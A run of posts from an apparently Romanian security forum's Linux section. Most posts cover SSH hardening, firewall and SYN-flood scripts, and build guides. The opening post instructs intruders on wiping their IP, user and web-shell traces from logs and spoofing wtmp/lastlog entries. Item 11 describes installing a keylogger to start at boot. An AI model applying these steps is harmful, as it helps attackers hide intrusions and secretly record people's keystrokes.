add the log file/files 6. Running the step 3 command would also let you know the top 20 IP's in the log files having most occurrences 7. Choose any suitable IP from the top 20 IP's as a spoof IP.....and you are ready to proceed with other options of script Logic: ====== Some log files are Ascii types, hence can be read and edited easily. Rest log files are binary types and are hard to read and edit directly. For ascii files, all the lines in various log files containing either of the following would be deleted: 1. The IP following -d parameter 2. User name following -u parameter (if it is other than root). Since the user 'root' has many entries, so to remain stealty it's better not to delete such lines. 3. Web shell path of your backdoor following -w parameter. For binary files, all the entries for your IP and user name (if it is other than root) would be spoofed (not deleted) IP would be spoofed to the Spoof IP provided and user name would be spoofed to "root" Pass the following to script: 1. The IP which you wish to delete/spoof in log files 2. The spoof IP. This would be the IP to replace the IP in binary log files 3. The user name you wish to delete/spoof in log files 4. Absolute web shell path to erase it's entries from log files (e.g. the web back doors) For spoofing in binary files, better analyze the files manually first and choose a good IP and user name You can do the following for binary file analysis: For wtmp: #last (shows: username, terminal, IP) #strings /var/log/wtmp (shows: username, terminal, IP) For utmp: #who (shows: username, terminal, IP) #strings /var/run/utmp (shows: username, terminal, IP) For lastlog: #lastlog (shows: username, terminal, IP) #strings /var/log/lastlog (shows: terminal, IP) For btmp (if exists): #lastb (shows: username) #strings /var/log/btmp (shows: username) Correct me if the logic is wrong at any place except for "/var/log/lastlog"
  5. In this small tutorial I'm showing the webmasters how to increase your server security by 50% in just 5 minutes. How is this possible? Most servers are getting hacked by unsecured SSH services, most of the time servers get brute forced to gain root access. Brute forcing is a hacking method by guessing the server root password, done by a script. How are we preventing this? We are going to disable root login, we are going to create a new user account. By disabling the root account, the brute forcer can't proceed because the username is unknown! How do I connect after applying this tutorial? Simply connect using the new username and password, after logged in you only have to execute 'su root' to switch to root. It will ask for the root password, once entered you are root in your server. Part 1 - Creating a new user. 1. Login into your server by SSH, using PuTTY. 2. Execute the following commands: useradd USERNAMEHERE passwd USERNAMEHERE USERNAMEHERE = Your desired login name for SSH. After executing the passwd command the console will ask you for a password. Be sure you use a secure password. (one capital, small letters, special chars and numbers. Example: RSTcenter881^359$) Now we have your new account. Part 2 - Changing the SSH settings. 3. Be sure you have nano install, if not execute the following: yum install -y nano 4.Now execute this: nano /etc/ssh/sshd_config Scroll down and find '#Port 22' and uncomment it. Change 22 to your desired SSH port. Pick a port number between 49152 and 65535, this is recommended. Then find the line '#PermitRootLogin yes' and uncomment it. Change yes to no. Close nano by Ctrl + X, then type Y and hit enter. Part 3 - Adjusting Firewall rules. 5. We need to open the port in iptables, this is done through these commands: iptables -t filter -A OUTPUT -p tcp --dport PORTNUMBERHERE -j ACCEPT iptables -t filter -A INPUT -p tcp --dport PORTNUMBERHERE -j ACCEPT service iptables save service iptables restart PORTNUMBERHERE = Your port number used in the SSH config. 6. Reload SSH config by executing: service sshd reload IMPORTANT: Before you close the current Putty console, please open up a new console and try to connect using the new settings. If it works then you can close the "old" console, but it you fail to login you can always revert the settings.
  6. https://www.youtube.com/watch?v=kgscaCk-QXw&hd=1
  7. Salutare din nou, Am la birou un "server" Linux (CentOS) care are asa: 2 placi gigabit onboard si alte 2 separata pe PCI sau PCIe. Se fac destule transferuri pe zi si am decis sa schimbam cele 2 placi de retea separata cu alte 2 tot gigabit dar profi (gasisem de la Intel la 160 lei/buc). Acuma sunt tot gigabit dar ceva la 30 de lei .... Daca inlocuiesc cele 2 placi de retea, mai trebuie sa fac ceva modificari in server la networking sau le vede si atat ? Ramane tot ifconfig-ul, eth-uri tot ? PS: am pus server intre " " deoarece este un desktop facut server. Multumesc.
  8. Hello guys, Am o mica, mare problema. Am de facut un server de vpn, aflat in spatele unui firewall. Nu-i problema aici. Problema vine la selectarea traficului doar catre resursele interne si nu a torentilor si a youtubului. Ma gandesc ca cea mai eleganta solutie ar fi sa se faca chestia asta client-side. Sa se foloseasca gatewayul VPN-ului doar pentru anumite adrese si restul traficului sa fie facut prin reteaua proprie. Sa dau si un exemplu, pentru a se intelege mai bine: Gigel, angajat la firma X vrea sa acceseze resursele din intranet. Are conexiune la un server de VPN (preferabil PPTP sau OpenVPN) si da drumu. Vasile, seful depart. IT nu vrea ca Gigel sa ocupe banda cu conexiunea lui la VPN(recte sa dwl pornosag de pe filelist, sau sa se uite la filme pe vplay/youtube pe banda de net a firmei). Asa ca intrebarea mea este, a mai avut cineva chestia asta de facut, stiti niste tips&pointers. P.S. Serverul o sa fie linux din start. Nu vreau sa ii pun sa editeze tabela de routare pe useri manual, si nici sa incarce ei vreau script(sunt curios daca in windows pot sa fac un script sa se execute automat cand se realizeaza conexiunea la VPN). Sper ca am fost destul de clar, daca nu va astept intrebarile despre eventualele nelamuriri. Nu vreau tunel SOCKS printr-un browser, m-am gandit deja la varianta asta, nu este doar portul 80 care va trebui sa fie accesibil. Multumesc.
  9. Sanewall making sense of firewalling Project information Sanewall is a firewall builder for Linux which uses an elegant language abstracted to just the right level. This makes it powerful as well as easy to use, audit, and understand. It allows you to create very readable configurations even for complex stateful firewalls. Sanewall can be used for almost any firewall need, including: control of any number of internal/external/virtual interfaces control of any combination of routed traffic setting up DMZ routers and servers all kinds of NAT providing strong protection (flooding, spoofing, etc.) transparent caches source MAC verification blacklists, whitelists The current experimental snapshots support IPv6. Sanewall abstracts the differences between IPv4 and IPv6, allowing you to define a common set of rules for both whilst permitting specific rules for each as you need. Sanewall is a fork of FireHOL. The configuration language is identical, just see this FAQ for some variable name changes. For now the FireHOL website is still the best source of introductory information. Sanewall is released under the GPLv2+ open source licence. Downloads Latest Release All Releases Daily Snapshots Git Repositories Source: Sanewall - Home
  10. LINK: Ubuntu Touch vine în Octombrie pentru tablete ?i smartphone
  11. spy_tux - a simple keylogger for linux ======================================== compilation ------------- add the path of the "event" file of your keyboard (which is in "/dev/input/" folder. most probably it is "event3"), your "admin password", path of your ".data" file and path of your ".keys" file to the corresponding places in the source code and compile it using make commend. usage ------- after compiling it copy it to the "/usr/bin" directory using , sudo cp spy_tux /usr/bin and run it using "spy_tux" command on terminal. spy_tux then the key logger will be started. the key strocks will be recorded in the ".data" file. add this command as a start up application to start it corresponding. more info: http://www.inf0warri0r.blogspot.com tcg.galahena@gmail.com licenses: ---------- Copyright 2012 Tharindra Galahena This file is part of spy_tux. spy_tux is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or any later version. spy_tux is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with spy_tux. If not, see Licenses - GNU Project - Free Software Foundation (FSF). Download
  12. iptables is built on top of netfilter, the packet alteration framework for Linux 2.4.x and 2.6.x. It is a major rewrite of its predecessor ipchains, and is used to control packet filtering, Network Address Translation (masquerading, portforwarding, transparent proxying), and special effects such as packet mangling. Changes: This release adds support for the Day Transition Ignore option in xt_time. Download Linux IPTables Firewall 1.4.17 ? Packet Storm
  13. Introduction to Firefox Firefox is a stand-alone browser based on the Mozilla codebase. This package is known to build and work properly using an LFS-7.2 platform. Package Information Download (FTP): ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/16.0.1/source/firefox-16.0.1.source.tar.bz2 Download MD5 sum: 78e641c67dc4a40cb3f48fce3e782d41 Download size: 85 MB Estimated disk space required: 994 MB (34 MB installed) (or 647 MB and 4.1 MB if using xulrunner) Estimated build time: 27 SBU (0.4 SBU if using xulrunner) Firefox Dependencies Required alsa-lib-1.0.26 GTK+-2.24.13 Zip-3.0 UnZip-6.0 Recommended yasm-1.2.0 libvpx-v1.1.0 (to allow Firefox to play webm videos). Optional D-Bus Bindings startup-notification-0.12 SQLite-3.7.14.1 Hunspell: open source spell checking, stemming, morphological analysis and generation under GPL, LGPL or MPL licenses libevent-2.0.20 Doxygen-1.8.2 gnome-vfs-2.24.4 libgnomeui-2.24.5 (for integration with the old version of Gnome) libnotify-0.7.5 NSPR-4.9.2 NSS-3.13.6 Wireless Tools-29 Valgrind Home (only for testing the jemalloc code) Wget-1.14 Xulrunner-16.0.1 User Notes: firefox – BLFS Trac Installation of Firefox There are two major methods for building Firefox. In the standard case, the entire suite of libraries is built and installed. In the other, most of the system is built using the procedures found in Xulrunner-16.0.1. This is advantageous if you are planning to build other related packages such as IcedTea-Web-1.3. With either build method, you need to run the main build procedure below with the appropriate options in the mozconfig file. Then use the appropriate install instructions depending on the chosen build method. The configuration of Firefox is accomplished by creating a mozconfig file containing the desired configuration options. A default mozconfig is created below. To see the entire list of available configuration options (and an abbreviated description of each one), issue ./configure --help. You may also wish to review the entire file and uncomment any other desired options. The commented line for --with-libxul-sdk has an escaped dollar sign - if you have chosed to paste the entries into a mozconfig file in your editor, you do not need the escape, it is only necessary when invoking a subshell in a HERE document. Create the file by issuing the following command: cat > mozconfig << EOF # If you have a multicore machine you can speed up the build by running # several jobs at once, but if you have a single core, delete this line: mk_add_options MOZ_MAKE_FLAGS="-j4" # If you have not installed Yasm, uncomment this option: # ac_add_options --disable-webm # If you have installed DBus-Glib delete this option: ac_add_options --disable-dbus # If you have installed wireless-tools delete this option: ac_add_options --disable-necko-wifi # If you have installed libnotify delete this option: ac_add_options --disable-libnotify # If you have installed xulrunner uncomment these two lines: # ac_add_options --with-system-libxul # ac_add_options --with-libxul-sdk=\$(pkg-config --variable=sdkdir libxul) # Note: The backslash above is to facilitate a paste operation. It # should not appear in the mozconfig file. # Uncomment these if you have installed them: # ac_add_options --enable-startup-notification # ac_add_options --enable-system-hunspell # ac_add_options --enable-system-sqlite # ac_add_options --with-system-libevent # ac_add_options --with-system-libvpx # ac_add_options --with-system-nspr # ac_add_options --with-system-nss mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/firefox-build-dir ac_add_options --enable-official-branding ac_add_options --prefix=/usr # The rest of these options have no effect if you're # building against an already installed xulrunner: ac_add_options --disable-crashreporter ac_add_options --disable-debug ac_add_options --disable-installer ac_add_options --disable-static ac_add_options --disable-tests ac_add_options --disable-updater ac_add_options --enable-shared ac_add_options --enable-system-cairo ac_add_options --enable-system-ffi ac_add_options --with-pthreads ac_add_options --with-system-jpeg ac_add_options --with-system-png ac_add_options --with-system-zlib EOF If you are building a stand-alone firefox with system versions of nspr, nss, or sqlite issue the following command: sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' \ browser/installer/Makefile.in && Compile Firefox by issuing the following commands: sed -i 's# ""##' browser/base/Makefile.in && make -f client.mk This package does not come with a test suite. If you have not linked Firefox against an installed Xulrunner: make -C firefox-build-dir/browser/installer Now, as the root user, if you have not linked Firefox against an installed Xulrunner, install the package: rm -rf /usr/lib/firefox-16.0.1 && mkdir /usr/lib/firefox-16.0.1 && tar -xvf firefox-build-dir/dist/firefox-16.0.1.en-US.linux-$(uname -m).tar.bz2 \ -C /usr/lib/firefox-16.0.1 --strip-components=1 && ln -sfv ../lib/firefox-16.0.1/firefox /usr/bin && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 && chown -R -v root:root /usr/lib/firefox-16.0.1 If you have linked against an already installed Xulrunner, as the root user: make -C firefox-build-dir install && rm /usr/bin/firefox && cat > /usr/bin/firefox << "HERE_DOC" && #!/bin/bash /usr/lib/xulrunner-16.0.1/xulrunner /usr/lib/firefox-16.0.1/application.ini "${@}" HERE_DOC chmod 755 /usr/bin/firefox && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 NPAPI Headers The above instructions just install the parts you need to run Firefox. If you want to compile gnash-0.8.10, the open source version of Flash, copy some headers that Gnash needs into /usr/include, as the root user: rm -rf /usr/include/npapi && mkdir -v /usr/include/npapi && cp -v dom/plugins/base/*.h /usr/include/npapi Command Explanations sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' ...: This sed fixes an error in the internal packaging check.. sed -i 's# ""##' browser/base/Makefile.in: This sed removes an unprintable control character from the title bar. make -f client.mk ...: Mozilla products are packaged to allow the use of a configuration file which can be used to pass the configuration settings to the configure command. make uses the client.mk file to get initial configuration and setup parameters. make -C firefox-build-dir/browser/installer: this creates a Firefox tarball similar to the ones you can download from Mozilla. tar -xfv firefox-build-dir/dist ...: This untars Firefox in /usr/lib. The --strip-components=1 option removes the leading 'firefox' directory from the filenames, allowing us to untar it into a versioned directory. make -C firefox-build-dir install: This runs make install in firefox-build-dir. ln -sfv ... /usr/bin/firefox: this puts a symbolic link to the firefox executable in your ${PATH}. mkdir -p /usr/lib/mozilla/plugins: this checks that /usr/lib/mozilla/plugins exists. ln -sv ... /usr/lib/firefox-16.0.1: this makes a symbolic link to /usr/lib/mozilla/plugins. It's not really needed, Firefox checks /usr/lib/mozilla/plugins by default, we make the symbolic link to keep all the plugins installed in one folder. Configuring Firefox If you deleted the --disable-webm option from your mozconfig, your Firefox can play most YouTube videos without the need for the flash plugin. To enable this, go to YouTube and click on 'Join the HTML5 Trial' (needs cookies enabled). If you use a desktop environment like Gnome or KDE you may like to create a firefox.desktop file so that Firefox appears in the panel's menus. If you didn't enable startup-notification in your mozconfig change the StartupNotify line to false. As the root user: mkdir -pv /usr/share/applications && cat > /usr/share/applications/firefox.desktop << "EOF" && [Desktop Entry] Encoding=UTF-8 Type=Application Name=Firefox Comment=Browse The Web Icon=firefox Exec=firefox Categories=Network;GTK;Application;Browser;WebBrowser; StartupNotify=true Terminal=false EOF ln -sfv /usr/lib/firefox-16.0.1/icons/mozicon128.png /usr/share/pixmaps/firefox.png Contents Installed Programs: firefox Installed Libraries: Numerous libraries, browser components, plugins, extensions, and helper modules installed in /usr/lib/firefox-16.0.1. Installed Directories: /usr/include/npapi and /usr/lib/firefox-16.0.1. sursa: Firefox-16.0.1
  14. Just old plain text tutorial idsplus ~ # cd /usr/src/ idsplus /usr/src # wget http://www.kernel.org/pub/linux/kernel/v3.0/linux-3.5.5.tar.bz2 --2012-10-05 23:53:55-- http://www.kernel.org/pub/linux/kernel/v3.0/linux-3.5.5.tar.bz2 Resolving www.kernel.org... 149.20.20.133, 149.20.4.69 Connecting to www.kernel.org|149.20.20.133|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 80984418 (77M) [application/x-bzip2] Saving to: “linux-3.5.5.tar.bz2” 100%[========================================================>] 80,984,418 14.3M/s in 9.8s 2012-10-05 23:54:05 (7.91 MB/s) - “linux-3.5.5.tar.bz2” saved [80984418/80984418] idsplus /usr/src # tar jxf linux-3.5.5.tar.bz2 idsplus /usr/src # rm linux rm: remove symbolic link `linux'? yes idsplus /usr/src # ln -s linux-3.5.5 linux idsplus /usr/src # cd linux idsplus /usr/src/linux # cp /boot/config-`uname -r` .config idsplus /usr/src/linux # make menuconfig // Selectati EXIT si YES idsplus /usr/src/linux # make bzImage modules modules_install install idsplus /usr/src/linux # mkinitramfs -o /boot/initrd-3.5.5 3.5.5 idsplus /usr/src/linux # update-grub2 Generating grub.cfg ... Found linux image: /boot/vmlinuz-3.5.5 Found initrd image: /boot/initrd-3.5.5 ....... done idsplus /usr/src/linux # init 6 // Dupa doua minute ... idsplus ~ # uname -a Linux idsplus 3.5.5 #1 SMP PREEMPT Sat Oct 6 00:40:49 CEST 2012 x86_64 GNU/Linux [*] Nota: Bootloader-ul folosit este grub.
  15. Sql_err404
  16. Rogentos este o distributie de linux romaneasca bazata pe Sabayon (Gentoo), cam singura la ora actuala, mai era o incercare de server. Mai multe detalii vezi pe site, sursele pachetelor si programelor aflate in dezvoltare se gasesc atat pe github cat si in repozitoriile userilor din organizatie. Este un proiect cu sursa libera la care poate lua parte oricine ca tester sau dezvoltator sau orice ce poate veni in ajutorul comunitatii. Distributia este inca la inceput si nu are prea multe lucruri "originale", dar in momentul asta sunt binevenite raportarile bugurilor si testele asupra distributiei pe diferite masini, in special laptopuri (pentru eventuale probleme cu driverele video).
  17. O problema banala care mi-a dat dureri de cap ieri. Pentru a face un mount NFS sintaxa< este urmatoarea mount numeserver:/path/server /path/client Cand un client NFS a unui sistem AIX 4.x , 5.x face un request catre un server NFS Linux ,de default acesta interogheaza un port cu un numar major iar serverul NFS din Linux ii face un reject.Acest lucru nu va permite ca un sistem AIX sa faca un mount din Linux , si va iesi cu o erroare "vmount: operation not permited". Pentru a rezolva problema se poate folosi urmatoarea sintaxa inainte de a face mount nfso -o nfs_use_reserved_ports=1 Acest lucru nu va fi valabil la reboot, asadar urmatoarea sintaxa va fi persistenta nfso -p -o nfs_use_reserved_ports=1 Acest parametru s-ar putea specifica si in smit atunci cand se face un mount Pentru a face un mount nfs in smit sintaxa este urmatoarea, (va intra intrun menu interactiv) smit mknfsmnt
  18. Salut, As vrea usor usor sã trec pe Linux dar nu stiu ce distributie ar fi potrivitã pt. mine ca incepãtor. Am incercat (live cd) Ubuntu si mi se apre interesant dar am vãzut cã unii zic despre Linux Mint cã ar fi ceva mai indicat... ? Si as vrea sã am si win (7 x64) pânã testez/mã obisnuiesc dar am inteles cã nu este indicat ca ambele sisteme de operare sã fie pe aceeasi partitie, este adevãrat ? Multumesc, Greenbytes
  19. Pare veche, dar nu stiam si nici nu credeam ca exista asa ceva, cosmarul lui pyth0n3 .
  20. Cateva sfaturi pentru cei care vor sa lucreze intrun ambient IT ca sysadmin Voi acoperi exact cerintele si ceea ce ar trebui ca o persoana sa cunoasca. Linux Singurele sisteme Linux folosite intrun enterprise vor fi RedHat Veti intalni des IBM Power Systems cu suport Linux (Versiuni RedHat 4,5,6) Rar se pot intalni si versiuni de Centos Pentru administrarea sistemelor Linux se cer urmatoarele cunostinte -Clustering (Red Hat cluster suite) -Virtualizare (Red Hat Enterprise Virtualization)(QEMU) un bun inceput -Storage (RAID,LVM) -Web (Tomcat) Asadar toate cunostintele precedente de Linux nu vor fi de folos daca nu se cunosc elementele care le-am spus mai sus Unix Sistemele intalnite sunt HP-UX,SOLARIS,AIX,True64 -Clustering (fiecare sistem in parte are un cluster suite) -Storage (RAID,VXVM,LVM,Solstice DiskSuite) -Web LotusDomino,Tomcat,Software grafica comercial sau software PBX comercial -Virtualizare PowerVM (IBM) Solaris Containers (Solaris) VmWare (HP) Windows (tinand cont ca sistemele windows sunt foarte rare si in acelasi timp vor fi doar sisteme virtualizate in Unix) Singurele motive pentru care exista windows intrun enterprise sunt urmatarele: -Active Directory (directory service) -Exchange -Ldap Database: -Oracle Real Application Clusters (RAC) -Oracle Database 11g Enterprise Edition Alte tipuri de DB nu vin folosite decat pentru hosting (Puteti sa uitati faptul ca cunoasteti Mysql sau Postgresql) Filesystem Se cer urmatoarele cunostinte Unix (UFS) Unix Filesystem Linux (GFS) Global File System Solaris (ZFS) Zetabyte Filesystem IBM (GPFS) General Parallel File System Unix/Linux in general (NFS) Network File System Toate aceste jucarii le veti intalni in fiecare zi de dimineata pana seara intrun ambient IT .Bineinteles vi se pot cere diplome sau certificate dar voi sunteti hackeri si reusiti sa treceti de orice interviu , asadar veti fi ghidati de catre propria voastra stralucire.(dar pe aceasta tema pot fi deschise alte topic-uri cum ar fi "Cum sa ajungi sysadmin intrun corporate cu numai 4 clase?).Bafta la studiat si la interviu.Daca aveti intrebari , nu ezitati sa le faceti, daca aveti idei sau cunostinte despre ce altceva ar trebui cunoscut nu ezitati sa le propuneti, nu stati cu mainile legate daca aveti ceva de spus in legatura cu subiectul , plimbati degetele pe tastiera .
  21. O sa incep acest tutorial cu o nota: Nu exista protectie DoS/DDoS absoluta. Toate sistemele de protectie impotriva atacurilor de acest gen nu fac decat sa inlature efectele negative si sa permita serviciilor sa fie accesibile pana la un anumit nivel. Mai jos va prezint un script util pentru minimizarea efectelor atacurilor SYN FLOOD. Aveti in vedere sa mariti “la nesimtire” urmatorii parametrii sysctl. - net.ipv4.tcp_max_syn_backlog - net.core.somaxconn - net.ipv4.tcp_max_tw_buckets #!/bin/sh active() { echo "---------------------------------------------" echo "Enabling syn flood protection ...." sysctl -w net.ipv4.tcp_syn_retries=3 sysctl -w net.ipv4.tcp_synack_retries=3 sysctl -w net.ipv4.tcp_keepalive_intvl=30 sysctl -w net.ipv4.tcp_keepalive_probes=5 sysctl -w net.ipv4.tcp_keepalive_time=1200 sysctl -w net.ipv4.tcp_wmem="8192 32536 16777216" sysctl -w net.ipv4.tcp_rmem="8192 16536 16777216" echo "---------------------------------------------" return 0 } aggresive() { echo "---------------------------------------------" echo "Enabling aggresive syn flood protection ...." sysctl -w net.ipv4.tcp_syn_retries=1 sysctl -w net.ipv4.tcp_synack_retries=1 sysctl -w net.ipv4.tcp_keepalive_intvl=5 sysctl -w net.ipv4.tcp_keepalive_probes=1 sysctl -w net.ipv4.tcp_keepalive_time=10 sysctl -w net.ipv4.tcp_wmem="3192 6536 16000" sysctl -w net.ipv4.tcp_rmem="3192 6536 16000" echo "---------------------------------------------" return 0 } default() { echo "---------------------------------------------" echo "Disabling syn flood protection ...." sysctl -w net.ipv4.tcp_syn_retries=5 sysctl -w net.ipv4.tcp_synack_retries=5 sysctl -w net.ipv4.tcp_keepalive_intvl=75 sysctl -w net.ipv4.tcp_keepalive_probes=9 sysctl -w net.ipv4.tcp_keepalive_time=7200 sysctl -w net.ipv4.tcp_wmem="16192 65536 16777216" sysctl -w net.ipv4.tcp_rmem="16192 65536 16777216" echo "---------------------------------------------" return 0 } case "$1" in start) active ;; stop) default ;; aggresive) aggresive ;; *) echo "Folosire: $0 {start|stop|aggresive}" exit 1 esac exit 0
  22. Mai jos puteti vedea un firewall minimal pentru Linux, care face urmatoarele lucruri: - Seteaza politica default cu drop (nu accepta niciun pachet, atat pe INPUT, FORWARD cat si pe OUTPUT). - Blocheaza pachetele TCP cu flag-uri invalide. - Blocheaza OS Fingerprint (detectarea sistemului de operare cu nmap sau alte tool-uri pentru os-fingerprint) - Permite icmp echo requests (ping) catre host. - Permite pachetele UDP venite de la nameserverele setate in "/etc/resolv.conf" (Source port 53) - Accepta conexiuni ssh doar de la surse bine stabilite (exemplu: de la office / home) . In acest fel suntem siguri ca daca ne stie cineva parola de la un utilizator, nu va putea intra. Este o buna masura de precautie impotriva scanning-ului. - Permite rularea serviciilor pe porturile standarde pentru: ftp, smtp, web, pop3 si https. Alte note: - EXTDEV reprezinta interfata externa de retea. - In sectiunea SECSHELL se pun adresele IP de unde dorim sa avem acces SSH. - NU folositi comanda "iptables -F" sau "iptables --flush"; politica default este DROP! (daca doriti sa scoateti firewall-ul din functiune, dati stop la el) - In sectiunea SERVICES sunt definite porturile pentru servicii: ftp, smtp, web, pop3 si https. - In acest exemplu minimal, nu exista reguli pe FORWARD. Daca serverul este folosit ca router, nu va functiona. Este necesar sa adaugati reguli pentru forward/nat - Nu folositi acest script inainte de a va da seama ce face exact, in special, nu folositi acest script pe servere la care nu aveti acces fizic, daca nu stiti ce face. - Scriptul se executa impreuna cu un argument: start, stop sau status. #!/bin/sh # Descriere: Firewall minimal pentru linux. ## -- Constante EXTDEV="eth0" SECSHELL="4.2.2.2 8.8.8.8 5.5.5.5" SERVICES="20 21 25 80 110 443" firewall_start () { echo "apply rules ...." ## -- Sterge orice regula prezenta iptables -F iptables -Z iptables -X iptables -F -t nat iptables -Z -t nat iptables -Z -t nat iptables -F -t mangle iptables -Z -t mangle iptables -X -t mangle ## -- Politica default iptables --policy INPUT DROP iptables --policy OUTPUT DROP iptables --policy FORWARD DROP ## -- Permite trafic nelimitat pe localhost iptables -I INPUT -d 127.0.0.0/8 -j ACCEPT iptables -I OUTPUT -s 127.0.0.0/8 -j ACCEPT ## -- Accepta orice conexiune care este stabilizata in momentul initializarii firewall-ului. iptables -I INPUT -m state --state ESTABLISHED -j ACCEPT ## -- Permite orice pachet catre OUT. iptables -I OUTPUT -p all -j ACCEPT ## -- Accepta sursele definite in SECSHELL pentru a se conecta la serviciul SSH. for i in $SECSHELL;do iptables -I INPUT -p tcp -s $i --dport 22 -j ACCEPT;done ## -- Accepta orice icmp echo (ping) iptables -I INPUT -p icmp --icmp-type 8 -j ACCEPT ## -- Blocheaza pachetele invalide iptables -I INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP iptables -I INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP iptables -I INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP iptables -I INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP iptables -I INPUT -p tcp --tcp-flags SYN,ACK NONE -j DROP iptables -I INPUT -p tcp --tcp-flags RST,FIN RST,FIN -j DROP iptables -I INPUT -p tcp --tcp-flags SYN,URG SYN,URG -j DROP iptables -I INPUT -p tcp --tcp-flags ALL SYN,PSH -j DROP iptables -I INPUT -p tcp --tcp-flags ALL SYN,ACK,PSH -j DROP ## -- Accepta orice port listat in SERVICES (pe tcp) for i in $SERVICES;do iptables -I INPUT -p tcp --dport $i -j ACCEPT;done ## -- Accepta orice pachet de la DNS-uri (port sursa 53) - doar cele listate in "/etc/resolv.conf" cat /etc/resolv.conf | \ awk '/^nameserver/ {print $2}' | \ xargs -n1 iptables -I INPUT -p udp --sport 53 -j ACCEPT -s echo "done, fw active." return 0 } firewall_status () { echo "fw status: " iptables -L -n -v return 0 } firewall_stop () { echo "ok. fw stop, clearing rules." iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT iptables -F iptables -Z iptables -X iptables -F -t nat iptables -Z -t nat iptables -Z -t nat iptables -F -t mangle iptables -Z -t mangle iptables -X -t mangle return 0 } case "$1" in start) firewall_start ;; stop) firewall_stop ;; status) firewall_status ;; *) echo "Folosire: $0 {start|status|stop}" exit 1 esac exit 0 ------------------------------- Daca doriti sa puneti tutorialul pe un alt site, va rog sa specificati sursa: https://rstcenter.com/forum/46641-firewall-minimal-pentru-linux.rst "Avem a multumi"
  23. Mul?i din utilizatorii de Linux s-au ciocnit probabil de imposibilitatea de a vizualiza canalele TV române?ti transmise de pe diverse site-uri, în special cele transmise prin protocolul celor de la Sopcast. De?i exist? posibilitatea de a viziona aceste stream-uri ?i din Linux, sunt necesari mul?i pa?i ?i pân? îi parcurgi pe to?i po?i pierde minute bune din filmul t?u preferat sau ocazii importante de gol, dac? e vorba de un meci de fotbal. Ei bine am încercat s? rezolv aceast? problem? prin conceperea programului TV-MAXE. Folosind VLC sau MPlayer ca backend, acest program aduce multe din canalele TV române?ti (?i câteva str?ine, ce-i drept) la dou? click-uri distan?? de utilizatorul dornic de digerat emisiuni televizate. Iar dac? mai ai ?i o telecomand? e perfect, deoarece TV-MAXE poate fi configurat s? o utilizeze (cu condi?ia ca aceasta s? fie compatibil? cu Linux). De asemenea nu e necesar s? cotrob?i pe Google ca s? vezi când ruleaz? emisiunea ta favorit? deoarece TV-MAXE include ?i un ghid TV care poate fi accesat u?or din interfa?a programului. Po?i de asemenea s? înregistrezi emisiunile TV (facilitate extrem de sensibil?, momentan) f?când posibil? revizionarea lor oricând este necesar. Programul este scris in Python ?i folose?te GTK ca toolkit grafic. Pe lâng? acestea necesit? VLC pentru redarea clipurilor video (de?i func?ioneaz? ?i cu mplayer), mencoder (dac? dori?i s? face?i înregistr?ri) ?i (dar nu neap?rat) lirc, în caz c? ave?i o telecomand?. Sopcast va fi instalat automat odat? cu instalarea pachetului .deb. Programul este creat de Ov1diu si prietenii sai. http://blog.ov1d1u.net/2010/11/tv-maxe.html Download
  24. Start DJing with Mixxx Mixxx is free, open source DJ software that gives you everything you need to perform live mixes. Set your Mixes Free Our advanced mixing engine gives you complete control over your live mixes. Hot cues, looping controls, and our high fidelity EQs let you mix and remix with more control. Create your own MP3 DJ mix today! Open Source means Freedom Why invest your time building your music library with expensive commercial DJ software, when it costs you a hundred dollars to upgrade every year? Through our open source license, Mixxx will always be free, and you'll never be locked in. Este un bun inlocuitor pentru Virtual Dj pe Linux, dar poate fi folosit si pe win. Download
  25. Tranzitia de la Windows la Linux In acest articol am de gand sa va impartasesc cateva din sfaturile pe care trebuie sa le luati in considerare inainte de a face trecerea de la Windows la Linux. Haideti sa numim aceasta lista de sfaturi si greseli “mica biblie a incepatorilor in Linux”. Nu va pot garanta insa va pot spune ca va va face mult mai usoara trecerea la Linux. Sunt de parere ca daca noii utilizatori ar sti sa omita cateva greseli totul ar fi mult mai simplu. O lista a acestor greseli ar fi: 1. Sa crezi ca Linux e ca Windows Este una dintre cele mai grave greseli pe care absolut toti noii utilizatori Linux o fac. Majoritatea utilizatorilor nici macar nu stiu sa defineasca corect cuvantul “sistem de operare” ca sa nu mai spunem ca multi nici macar nu au idee ce diferente sunt intre Windows XP sau Windows 7, ce este un kernel, ce inseamna erarhia fisierelor intr-un sistem de operare si asa mai departe. Linux nu este Windows, Linux este un kernel ce sta la baza altor sisteme de operare precum Ubuntu, Linux Mint si alte distributii. Aceste 2 sisteme sunt complet diferite asemanarile fiind doar in interfata grafica acestora si atat. 2.Sa incercati sa faceti ca fisierele .exe sa se execute in Linux. Trebuie sa recunosc ca asta a fost greseala pe care am facuto si eu. Linux nu are nevoie de fisiere .exe pentru a instala sau rula programe. Defapt asta e si punctul forte a Linuxului si una din principalele motive pentru care Ubuntu si alte distributii Linux sunt atat de sigure, acestea nu ruleaza fisiere .exe (cel putin nu nativ) Fisierul .exe este unul dintre cele mai manipulabile fisiere din lume asta insemnand ca cei ce vor sa faca rau pot foarte usor sa va “otraveasca” sistemul prin simpla manipulare si modificare a unui fisier .exe. Din fericire nu si pe Ubuntu Linux! Si totusi daca doriti neaparat sa rulati .exe in Linux o puteti face cu ajutorul lui Wine insa nu este nevoie. Sunt softuri pentru Ubuntu Linux suficiente cat sa va satisfaca nevoile. 3. Sa alegeti o distributie gresita. Foarte multi fac greseala de a alege o distributie gresita atunci cand vor sa treaca la Linux. Imaginati-va un incepator alegand Gentoo, Fedora sau Slackware. Nu spun ca nu 